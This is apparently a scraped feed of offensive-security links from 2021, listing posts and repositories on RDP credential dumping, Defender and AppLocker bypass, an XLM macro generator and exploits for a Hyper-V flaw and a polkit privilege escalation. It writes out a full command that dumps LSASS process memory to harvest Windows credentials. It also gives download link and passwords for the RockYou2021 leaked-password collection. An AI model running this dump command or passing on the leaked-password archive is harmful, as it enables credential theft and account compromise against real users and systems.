Hexacorn | Blog BYOT – Bring Your Own Telemetry
https://www.hexacorn.com/blog/2021/05/20/byot-bring-your-own-telemetry/
https://www.hexacorn.com/blog/2021/05/20/byot-bring-your-own-telemetry/
Dumping RDP Credentials – Penetration Testing Lab
https://pentestlab.blog/2021/05/24/dumping-rdp-credentials/
https://pentestlab.blog/2021/05/24/dumping-rdp-credentials/
Penetration Testing Lab
Dumping RDP Credentials
Administrators typically use Remote Desktop Protocol (RDP) in order to manage Windows environments remotely. It is also typical RDP to be enabled in systems that act as a jumpstation to enable user…
GitHub - 0vercl0k/CVE-2021-28476: PoC for CVE-2021-28476 a guest-to-host "Hyper-V Remote Code Execution Vulnerability" in vmswitch.sys.
https://github.com/0vercl0k/CVE-2021-28476
https://github.com/0vercl0k/CVE-2021-28476
GitHub
GitHub - 0vercl0k/CVE-2021-28476: PoC for CVE-2021-28476 a guest-to-host "Hyper-V Remote Code Execution Vulnerability" in vmswitch.sys.
PoC for CVE-2021-28476 a guest-to-host "Hyper-V Remote Code Execution Vulnerability" in vmswitch.sys. - 0vercl0k/CVE-2021-28476
%COMSPEC% /Q /c echo powershell.exe -NoP -C "%windir%\System32\rundll32.exe %windir%\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id Windows\Temp\ec391128.arj full;Wait-Process -Id (Get-Process rundll32).id" 2^>^&1 > temp.bat & %COMSPEC% /Q /c temp.bat & del temp.bat
How to bypass Defender in a few easy steps - arty-hlr
https://arty-hlr.com/blog/2021/05/06/how-to-bypass-defender/
https://arty-hlr.com/blog/2021/05/06/how-to-bypass-defender/
GitHub - o1mate/AppLocker-Bypass: Bypassing AppLocker with C#
https://github.com/o1mate/AppLocker-Bypass
https://github.com/o1mate/AppLocker-Bypass
GitHub
GitHub - o1mate/AppLocker-Bypass: Bypassing AppLocker with C#
Bypassing AppLocker with C#. Contribute to o1mate/AppLocker-Bypass development by creating an account on GitHub.
RockYou2021 passwords collection
8,459,060,239 unique passwords
Download: https://mega.nz/folder/Ip4iBDwT#RtYn83ar3IN1a8_dmR4A_g
Password: ye6KVrSAnxEXsRm9_8QkQQ
Unzip: ry2021
8,459,060,239 unique passwords
Download: https://mega.nz/folder/Ip4iBDwT#RtYn83ar3IN1a8_dmR4A_g
Password: ye6KVrSAnxEXsRm9_8QkQQ
Unzip: ry2021
mega.nz
File folder on MEGA
GitHub - STMSolutions/boobsnail: BoobSnail allows generating Excel 4.0 XLM macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation.
https://github.com/STMSolutions/boobsnail
https://github.com/STMSolutions/boobsnail
GitHub
GitHub - STMCyber/boobsnail: BoobSnail allows generating Excel 4.0 XLM macro. Its purpose is to support the RedTeam and BlueTeam…
BoobSnail allows generating Excel 4.0 XLM macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation. - GitHub - STMCyber/boobsnail: BoobSnail allows generating Excel 4.0 XLM...
GitHub - swapravo/polkadots: CVE-2021-3560 Local PrivEsc Exploit
https://github.com/swapravo/polkadots
https://github.com/swapravo/polkadots
GitHub
GitHub - swapravo/polkadots: CVE-2021-3560 Local PrivEsc Exploit
CVE-2021-3560 Local PrivEsc Exploit. Contribute to swapravo/polkadots development by creating an account on GitHub.